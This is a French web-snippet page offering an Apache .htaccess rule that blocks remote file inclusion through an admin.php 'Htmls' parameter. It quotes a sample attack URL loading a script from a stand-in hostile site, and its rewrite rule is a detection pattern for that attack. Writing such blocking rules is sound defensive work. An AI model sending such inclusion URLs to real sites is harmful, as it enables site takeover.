Bouts de Codes

Empêcher le hack via admin.php

Information sur le code source

Enregistr� le 18 Mai 2008 - Vu 7290 fois
Code source zipp�: t�l�charger le zip
Impression: imprimer le code
  • Sociale bookmarking: Digg ce code sur digg.com
  • Bookmark ce code sur del.icio.us
  • Partage ce code sur Facebook
  • Bookmark ce code sur Google
  • Bookmark ce code sur Yahoo
  • Ajoute Emp�cher le hack via admin.php
Votre avis: 
 
Ecrit par :  admin
[66] sources en Apache voir
 

Description du code source

Informations sur le code source

Il est possible de prendre le contrôle d'un site disposant d'un script admin.php avec un paramètre Htmls. En effet ce paramètre permet de faire exécuter un script externe. Pour interdire l'exécution par un hacker de ce script externe il est indispensable d'ajouter une règle dans le fichier .htaccess qui retourne un code retour 403. Les url essayant de prendre la main sur le site sont sous la forme : http://www.example.com/admin.php?Htmls=http://www.sitepourri.com/page.txt?

Voir également :
» Page d'erreur 403 personnalisée

Code Source



.01
.02
.03
.04
.05
.06
.07
.08
.09
.10
.11
.12
.13
.14
.15
.16
.17
.18
.19
.20
.21
.22
.23
   

################################################################################
#                                                                              #
#                         __                   _ __  _                         #
#               __ ______/ /______ _    ______(_) /_(_)__  ___ _               #
#              / // / __/ / __/ -_) |/|/ / __/ / __/ / _ \/ _ `/               #
#              \_,_/_/ /_/_/  \__/|__,__/_/ /_/\__/_/_//_/\_, /                #
#                                                        /___/                 #
#                                                                              #
#                                                                              #
################################################################################
#                                                                              #
# Titre          : Emp�cher le hack via admin.php                              #
#                                                                              #
# URL            : /scripts21-Apache.htm             #
# Auteur         : admin                                                       #
# Date �dition   : 18 Mai 2008                                                 #
#                                                                              #
################################################################################

RewriteCond %{QUERY_STRING} ^(.*&)?Htmls=http://
RewriteRule ^(.*/)?admin.php$ - [F,L]
Ajouter un commentaire

RSS
snippets

RSS
commentaires
 
Code de s�curit�
Attention: Les champs marqu�s d'une �toile * sont obligatoires
Librairie

Langages de programmation

La librairie est ouverte � tous et elle est acc�s principalement sur les langages Snippets. Vous trouverez aussi d'autres langages de programmation tel que le CSS, HTML, AJAX, ASP.. Plus de 300 r�f�rences facilement accessibles. Visiter

  • Apache (version 2) : Installation, administration et s�curisation
  • Debian GNU/Linux - Services r�seaux (Bind DNS, Apache, NFS, Samba, Messagerie...)
  • Pr�cis & Concis : Apache
  • LAMP (Linux, Apache, MySQL, PHP) Pack 4 volumes : Ma�trisez vos applications Web en Open Source
  • PHP 5.2 et APACHE 2 - Ma�trisez le d�veloppement et le d�ploiement de votre site web interactif [Nouvelle version]
  • Apache 2.0 : Guide de l'administrateur Linux
  • Apache Tomcat 5 : Serveur d'application Java ; Administration sous Windows ou Linux
  • Apache
  • LAMP (Linux, Apache, MySQL, PHP) - Coffret de 4 livres : Ma�trisez vos applications Web Open Source [Nouvelles versions]
  • Apache : La R�f�rence